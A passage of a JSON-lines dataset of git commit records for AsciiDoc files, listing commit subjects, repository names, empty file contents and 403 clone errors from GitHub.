,LihuaWu\/lihuawu.github.io,mnishihan\/mnishihan.github.io,plaidshirtguy\/plaidshirtguy.github.io,gongxiancao\/go
ngxiancao.github.io,mazongo\/mazongo.github.io,ovo-6\/ovo-6.github.io,raloliver\/raloliver.github.io,maorodriguez\/maorodriguez.github.io,innovation-jp\/innovation-jp.github.io,carlosdelfino\/carlosdelfino-hubpress,Kif11\/Kif11.github.io,florianhofmann\/florianhofmann.github.io,mubix\/blog.room362.com,alexgaspard\/alexgaspard.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,alick01\/alick01.github.io,egorlitvinenko\/egorlitvinenko.github.io,xumr0x\/xumr0x.github.io,quentindemolliens\/quentindemolliens.github.io,fasigpt\/fasigpt.github.io,unay-cilamega\/unay-cilamega.github.io,vs4vijay\/vs4vijay.github.io,Lh4cKg\/Lh4cKg.github.io,flug\/flug.github.io,nickwanhere\/nickwanhere.github.io,dakeshi\/dakeshi.github.io,ghostbind\/ghostbind.github.io,ron194\/ron194.github.io,jkschneider\/jkschneider.github.io,juliardi\/juliardi.github.io,teilautohall\/teilautohall.github.io,spe\/spe.github.io.hubpress,YJSoft\/yjsoft.github.io,CreditCardsCom\/creditcardscom.github.io,roobyz\/roobyz.github.io,djengineerllc\/djengineerllc.github.io,pallewela\/pallewela.github.io,camilo28\/camilo28.github.io,pokev25\/pokev25.github.io,dfjs\/dfjs.github.io,raloliver\/raloliver.github.io,gjagush\/gjagush.github.io,stratdi\/stratdi.github.io,RandomWebCrap\/randomwebcrap.github.io,reggert\/reggert.github.io,mdinaustin\/mdinaustin.github.io,fgracia\/fgracia.github.io,wayr\/wayr.github.io,fbruch\/fbruch.github.com,BulutKAYA\/bulutkaya.github.io,Mynor-Briones\/mynor-briones.github.io,tcollignon\/tcollignon.github.io,cothan\/cothan.github.io,emtudo\/emtudo.github.io,cothan\/cothan.github.io,xavierdono\/xavierdono.github.io,cdelmas\/cdelmas.github.io,somosazucar\/centroslibres,jbrizio\/jbrizio.github.io,mkorevec\/mkorevec.github.io,prateekjadhwani\/prateekjadhwani.github.io,scholzi94\/scholzi94.github.io,severin31\/severin31.github.io,Driven-Development\/Driven-Development.github.io,parkowski\/parkowski.github.io,kimkha-blog\/kimkha-blog.github.io,wayr\/wayr.github.io,jaganz\/jaganz.github.io,sfoubert\/sfoubert.github.io,ComradeCookie\/comradecookie.github.io,deformat\/deformat.github.io,MichaelIT\/MichaelIT.github.io,rage5474\/rage5474.github.io,ecmeyva\/ecmeyva.github.io,ennerf\/ennerf.github.io,joescharf\/joescharf.github.io,ahopkins\/amhopkins.com,Le6ow5k1\/le6ow5k1.github.io,iveskins\/iveskins.github.io,puzzles-engineer\/puzzles-engineer.github.io,Ugotsta\/Ugotsta.github.io,Bulletninja\/bulletninja.github.io,mnishihan\/mnishihan.github.io,polarbill\/polarbill.github.io,Zatttch\/zatttch.github.io,AlonsoCampos\/AlonsoCampos.github.io,fbridault\/sandblog,roobyz\/roobyz.github.io,codechunks\/codechunks.github.io,lametaweb\/lametaweb.github.io,sgalles\/sgalles.github.io,christianmtr\/christianmtr.github.io,raditv\/raditv.github.io,YJSoft\/yjsoft.github.io,scottellis64\/scottellis64.github.io,nilsonline\/nilsonline.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,nobodysplace\/nobodysplace.github.io,smirnoffs\/smirnoffs.github.io,itsallanillusion\/itsallanillusion.github.io,RWOverdijk\/rwoverdijk.github.io,FilipLaz\/filiplaz.github.io,diogoan\/diogoan.github.io,Lh4cKg\/Lh4cKg.github.io,ragingsmurf\/ragingsmurf.github.io,triskell\/triskell.github.io,PertuyF\/PertuyF.github.io,marioandres\/marioandres.github.io,jcsirot\/hubpress.io,richard-popham\/richard-popham.github.io,willnewby\/willnewby.github.io,iwangkai\/iwangkai.github.io,chrizco\/chrizco.github.io,RaphaelSparK\/RaphaelSparK.github.io,itsashis4u\/hubpress.io,crotel\/crotel.github.com,naru0504\/hubpress.io,henning-me\/henning-me.github.io,TsungmingLiu\/tsungmingliu
.github.io,xmichaelx\/xmichaelx.github.io,Murazaki\/murazaki.github.io,RWOverdijk\/rwoverdijk.github.io,manikmagar\/manikmagar.github.io,LearningTools\/LearningTools.github.io,doochik\/doochik.github.io,uzuyh\/hubpress.io,skeate\/skeate.github.io,jbutzprojects\/jbutzprojects.github.io,YannBertrand\/yannbertrand.github.io,skeate\/skeate.github.io,CBSti\/CBSti.github.io,yeddiyarim\/yeddiyarim.github.io,tcollignon\/tcollignon.github.io,dakeshi\/dakeshi.github.io,minditech\/minditech.github.io,sumit1sen\/sumit1sen.github.io,htapia\/htapia.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,cothan\/cothan.github.io,CreditCardsCom\/creditcardscom.github.io,warpcoil\/warpcoil.github.io,endymion64\/VinJBlog,fuhrerscene\/fuhrerscene.github.io,emtudo\/emtudo.github.io,carlomorelli\/carlomorelli.github.io,SBozhko\/sbozhko.github.io,blater\/blater.github.io,SuperMMX\/supermmx.github.io,Aferide\/Aferide.github.io,Bulletninja\/bulletninja.github.io,chaseey\/chaseey.github.io,neurodiversitas\/neurodiversitas.github.io,raytong82\/raytong82.github.io,YannDanthu\/YannDanthu.github.io,quangpc\/quangpc.github.io,eunas\/eunas.github.io,spe\/spe.github.io.hubpress,jsonify\/jsonify.github.io,nickwanhere\/nickwanhere.github.io,gquintana\/gquintana.github.io,InformatiQ\/informatiq.github.io,vadio\/vadio.github.io,gardenias\/sddb.com,darsto\/darsto.github.io,atfd\/hubpress.io,apalkoff\/apalkoff.github.io,chris1234p\/chris1234p.github.io,pzmarzly\/pzmarzly.github.io,roelvs\/roelvs.github.io,itsallanillusion\/itsallanillusion.github.io,matthiaselzinga\/matthiaselzinga.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,chris1234p\/chris1234p.github.io,faldah\/faldah.github.io,blitzopteron\/ApesInc,jaredmorgs\/jaredmorgs.github.io,sskorol\/sskorol.github.io,ComradeCookie\/comradecookie.github.io,eyalpost\/eyalpost.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,n15002\/main,yejodido\/hubpress.io,nullbase\/nullbase.github.io,carlosdelfino\/carlosdelfino-hubpress,neocarvajal\/neocarvajal.github.io,MatanRubin\/MatanRubin.github.io,ciekawy\/ciekawy.github.io,roobyz\/roobyz.github.io,jivank\/jivank.github.io,christiannolte\/hubpress.io,pamasse\/pamasse.github.io,fbridault\/sandblog,dgrizzla\/dgrizzla.github.io,henning-me\/henning-me.github.io,devananda\/devananda.github.io,lxjk\/lxjk.github.io,kreids\/kreids.github.io,SingularityMatrix\/SingularityMatrix.github.io,mattbarton\/mattbarton.github.io,djmdata\/djmdata.github.io,cmolitor\/blog,introspectively\/introspectively.github.io,hutchr\/hutchr.github.io,shinchiro\/shinchiro.github.io,devkamboj\/devkamboj.github.io,shutas\/shutas.github.io,iolabailey\/iolabailey.github.io,costalfy\/costalfy.github.io,thrasos\/thrasos.github.io,chdask\/chdask.github.io,jakkypan\/jakkypan.github.io,hayyuelha\/technical-blog,Aferide\/Aferide.github.io,manueljordan\/manueljordan.github.io,nilsonline\/nilsonline.github.io,sskorol\/sskorol.github.io,rballan\/rballan.github.io,msravi\/msravi.github.io,YannDanthu\/YannDanthu.github.io,KurtStam\/kurtstam.github.io,chrizco\/chrizco.github.io,atfd\/hubpress.io,lametaweb\/lametaweb.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,fbiville\/fbiville.github.io,iolabailey\/iolabailey.github.io,severin31\/severin31.github.io,sskorol\/sskorol.github.io,fgracia\/fgracia.github.io,fbiville\/fbiville.github.io,skeate\/skeate.github.io,mdramos\/mdramos.github.io,silviu\/silviu.github.io,YannDanthu\/YannDanthu.github.io,dannylane\/dannylane.github.io,tongqqiu\/tongqqiu.github.io,justafool5\/justafool5.github.io,lonelee-kirsi\
/lonelee-kirsi.github.io,roelvs\/roelvs.github.io,Cnlouds\/cnlouds.github.io,blahcadepodcast\/blahcadepodcast.github.io,blater\/blater.github.io,Zatttch\/zatttch.github.io,SysAdmin-Blog\/SysAdmin-Blog.github.io,olivierbellone\/olivierbellone.github.io,wiibaa\/wiibaa.github.io,bencekiraly\/bencekiraly.github.io,lucasferraro\/lucasferraro.github.io,allancorra\/allancorra.github.io,xumr0x\/xumr0x.github.io,devopSkill\/devopskill.github.io,gdfuentes\/gdfuentes.github.io,alphaskade\/alphaskade.github.io,holtalanm\/holtalanm.github.io,wols\/time,wushaobo\/wushaobo.github.io,abien\/abien.github.io,Roen00\/roen00.github.io,daemotron\/daemotron.github.io,therebelrobot\/blog-n.ode.rocks,realraindust\/realraindust.github.io,alchapone\/alchapone.github.io,naru0504\/hubpress.io,TheGertproject\/TheGertproject.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,theofilis\/theofilis.github.io,dfmooreqqq\/dfmooreqqq.github.io,hfluz\/hfluz.github.io,karcot\/trial1,Mynor-Briones\/mynor-briones.github.io,hyha600\/hyha600.github.io,arthurmolina\/arthurmolina.github.io,mmhchan\/mmhchan.github.io,alphaskade\/alphaskade.github.io,gjagush\/gjagush.github.io,AntoineTyrex\/antoinetyrex.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,DominikVogel\/DominikVogel.github.io,fuhrerscene\/fuhrerscene.github.io,luzhox\/mejorandola.github.io,ioisup\/ioisup.github.io,tedbergeron\/hubpress.io,topranks\/topranks.github.io,tosun-si\/tosun-si.github.io,netrunnerX\/netrunnerx.github.io,yejodido\/hubpress.io,sfoubert\/sfoubert.github.io,rdspring1\/rdspring1.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,ronanki\/ronanki.github.io,lifengchuan2008\/lifengchuan2008.github.io,hoernschen\/hoernschen.github.io,mastersk3\/hubpress.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,ekroon\/ekroon.github.io,kunicmarko20\/kunicmarko20.github.io,Fendi-project\/fendi-project.github.io,al1enSuu\/al1enSuu.github.io,PauloMoekotte\/PauloMoekotte.github.io,simevidas\/simevidas.github.io,neurodiversitas\/neurodiversitas.github.io,anshu92\/blog,scholzi94\/scholzi94.github.io,thiderman\/daenney.github.io,thykka\/thykka.github.io,epayet\/blog,foxsofter\/hubpress.io,quentindemolliens\/quentindemolliens.github.io,alchemistcookbook\/alchemistcookbook.github.io,ciptard\/ciptard.github.io,Aferide\/Aferide.github.io,lmcro\/hubpress.io,wushaobo\/wushaobo.github.io,haxiomic\/haxiomic.github.io,pokev25\/pokev25.github.io,thrasos\/thrasos.github.io,caseyy\/caseyy.github.io,topranks\/topranks.github.io,pointout\/pointout.github.io,debbiezhu\/debbiezhu.github.io,roamarox\/roamarox.github.io,live-smart\/live-smart.github.io,IdeaThoughtStream\/IdeaThoughtStream.github.io.old2,cmosetick\/hubpress.io,pysaumont\/pysaumont.github.io,RandomWebCrap\/randomwebcrap.github.io,ciptard\/ciptard.github.io,marioandres\/marioandres.github.io,sebasmonia\/sebasmonia.github.io,parkowski\/parkowski.github.io,randhson\/Blog,flug\/flug.github.io,tr00per\/tr00per.github.io,jgornati\/jgornati.github.io,angilent\/angilent.github.io,Akanoa\/akanoa.github.io,dbect\/dbect.github.io,ennerf\/ennerf.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,Rackcore\/Rackcore.github.io,Kif11\/Kif11.github.io,mozillahonduras\/mozillahonduras.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"459dd80d374091166e0579975967cdebd59d700e","subject":"Update 
2015-03-18-.adoc","message":"Update 2015-03-18-.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-18-.adoc","new_file":"_posts\/2015-03-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"295697a6d93d8909361ad1e0e4f9721de2bf5134","subject":"Update 2016-03-15-.adoc","message":"Update 2016-03-15-.adoc","repos":"s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io,s-f-ek971\/s-f-ek971.github.io","old_file":"_posts\/2016-03-15-.adoc","new_file":"_posts\/2016-03-15-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/s-f-ek971\/s-f-ek971.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85f09615537bca031d2444b85d9ba25e9119dde1","subject":"Add scaling documentation","message":"Add scaling documentation\n","repos":"redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76c3ebd3ceca5724acfa1b56378a8c4da9618c42","subject":"Create README.adoc","message":"Create README.adoc","repos":"robo-kids\/scratch-for-kids","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robo-kids\/scratch-for-kids.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bff4d715c2d511c5b4b577df56ae9fe6c428247b","subject":"Released v0.2.0","message":"Released v0.2.0\n","repos":"resilience4j\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,goldobin\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,RobWin\/circuitbreaker-java8","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8fefd5e421dadc1e69a558ecd5c67d4296f82f8","subject":"[docs] Add docs on full data dirs","message":"[docs] Add docs on full data dirs\n\nChange-Id: If1081cab4c84789d29a0ccdccfd11c190b6164cf\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9967\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Will Berkeley 
<c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"948c7d7ddb909f4ffb959f25387f9ad83a6ee1cf","subject":"Update 2016-08-30-Hello.adoc","message":"Update 2016-08-30-Hello.adoc","repos":"RandomWebCrap\/randomwebcrap.github.io,RandomWebCrap\/randomwebcrap.github.io,RandomWebCrap\/randomwebcrap.github.io,RandomWebCrap\/randomwebcrap.github.io","old_file":"_posts\/2016-08-30-Hello.adoc","new_file":"_posts\/2016-08-30-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RandomWebCrap\/randomwebcrap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"116bc9629be5e08acb9963f35a9b199a51235512","subject":"Update 2016-09-03-Title.adoc","message":"Update 2016-09-03-Title.adoc","repos":"bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io","old_file":"_posts\/2016-09-03-Title.adoc","new_file":"_posts\/2016-09-03-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbsome\/bbsome.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5e9ad69f2f49328f085f957f013ff0a9f7fe9b0","subject":"Installing PIL in virtualenv","message":"Installing PIL in virtualenv\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0b9c4ebbfe7c57a823fa0b42467d4bcea5fe733e","subject":"Updated documentation","message":"Updated documentation","repos":"RobWin\/javaslang-circuitbreaker,goldobin\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"040ba4c8e98863ae51698013fc5ba21578d4cea3","subject":"add a README","message":"add a 
README\n","repos":"azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95b84c3f4ae03b076d33bdab6f93446dfff3e747","subject":"doc update","message":"doc update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35a23cff2baf27083ee4ac24f98861f25583437d","subject":"Added Http Session Handling docs","message":"Added Http Session Handling docs\n","repos":"apache\/camel,gnodet\/camel,davidkarlsen\/camel,cunningt\/camel,mcollovati\/camel,nicolaferraro\/camel,tdiesler\/camel,davidkarlsen\/camel,christophd\/camel,kevinearls\/camel,adessaigne\/camel,onders86\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,davidkarlsen\/camel,kevinearls\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,apache\/camel,Fabryprog\/camel,objectiser\/camel,tadayosi\/camel,zregvart\/camel,tdiesler\/camel,christophd\/camel,ullgren\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,gnodet\/camel,tdiesler\/camel,mcollovati\/camel,apache\/camel,tdiesler\/camel,punkhorn\/camel-upstream,cunningt\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,tdiesler\/camel,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,DariusX\/camel,pax95\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,pmoerenhout\/camel,Fabryprog\/camel,ullgren\/camel,onders86\/camel,pmoerenhout\/camel,onders86\/camel,tdiesler\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,objectiser\/camel,nicolaferraro\/camel,gnodet\/camel,onders86\/camel,adessaigne\/camel,alvinkwekel\/camel,CodeSmell\/camel,pax95\/camel,kevinearls\/camel,mcollovati\/camel,pax95\/camel,Fabryprog\/camel,pax95\/camel,apache\/camel,kevinearls\/camel,CodeSmell\/camel,onders86\/camel,alvinkwekel\/camel,zregvart\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,adessaigne\/camel,onders86\/camel,nikhilvibhav\/camel,tadayosi\/camel,DariusX\/camel,pmoerenhout\/camel,kevinearls\/camel,tadayosi\/camel,ullgren\/camel,DariusX\/camel,DariusX\/camel,apache\/camel,objectiser\/camel,cunningt\/camel,mcollovati\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,alvinkwekel\/camel,ullgren\/camel,CodeSmell\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,apache\/camel,CodeSmell\/camel,cunningt\/camel,christophd\/camel,nicolaferraro\/camel,objectiser\/camel,adessaigne\/camel,zregvart\/camel","old_file":"docs\/user-manual\/en\/http-session-handling.adoc","new_file":"docs\/user-manual\/en\/http-session-handling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"001e449be25bd2991f19f40bf9f7d275629fad4a","subject":"Update README.adoc","message":"Update README.adoc\n\nFixed links to follow 
the asciidoctor syntax, not MD.","repos":"mbenson\/spring-cloud-config,rajkumargithub\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,spring-cloud\/spring-cloud-config,fangjing828\/spring-cloud-config,rajkumargithub\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,appleman\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,thomasdarimont\/spring-cloud-config,shakuzen\/spring-cloud-config,royclarkson\/spring-cloud-config,spring-cloud\/spring-cloud-config,psbateman\/spring-cloud-config,royclarkson\/spring-cloud-config,appleman\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,mstine\/spring-cloud-config,fkissel\/spring-cloud-config,fkissel\/spring-cloud-config,royclarkson\/spring-cloud-config,mstine\/spring-cloud-config,mbenson\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"087f43ff9bffb2d2edfdcbfe3970382ebb9631bf","subject":"Add HTML version for Python","message":"Add HTML version for Python\n","repos":"cmpitg\/programming-language-notes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f3defa7f9f924fd79f66b283f168b5709cb71a4c","subject":"Create README.adoc","message":"Create README.adoc","repos":"cybercomsweden\/rest-doc,ivargrimstad\/rest-doc,peterivarsson\/rest-doc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterivarsson\/rest-doc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b303f22dc4914dba83afa6d758cbfa27b44f783","subject":"README: rewrite\/revision of many sections","message":"README: rewrite\/revision of many sections\n\nThe introduction uses wording mostly copied from the web site to\nmaintain consistency within the project, and the usage of the term\n\"IWAD\" is greatly reduced. I still define it, but only so that\nsomeone might become familiar with the term when other people use it,\nrather than as a primary term. Likewise, \"port\" and \"source port\"\nare largely replaced with \"engine,\" while still defining the former so a\nnewbie can understand what community members are speaking of.\n\n\"How to play\" has some additional information about how to actually\nget an engine to play the game. It was previously lacking. Odamex is\nthe only port actually outright named as a recommendation, but I try\nto keep from sounding like it's the _only_ choice.\n\nThe \"general rules\" to follow have been reduced from four to three, the\nfirst one heavily rewritten so as not to imply that derived works are\ncompletely forbidden.\n\nThe \"Using Git\" section also had a major reworking. 
I don't really\nlike the section entirely myself. It either needs more revision or\nshould be ejected entirely.\n\nQuite a few linguistic tweaks in all of the sections.\n\nGame names are more consistently italicized.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c93a3d0607c04dabb5166d683870931860b1eea0","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/spring-android,spring-projects\/spring-android","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-android.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7818a60469faf69ebe0b45d8062ae2dcedc30357","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d386ab2d6b60f88917b132ce7033642f213f983","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3207556f40114196fa40fb7b3d9c1746d6d0e59","subject":"Update 2017-10-27-.adoc","message":"Update 2017-10-27-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-.adoc","new_file":"_posts\/2017-10-27-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc97654536f316bd8ed12c055c2d135a19057b22","subject":"Update 2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","message":"Update 2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_file":"_posts\/2015-08-27-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned 
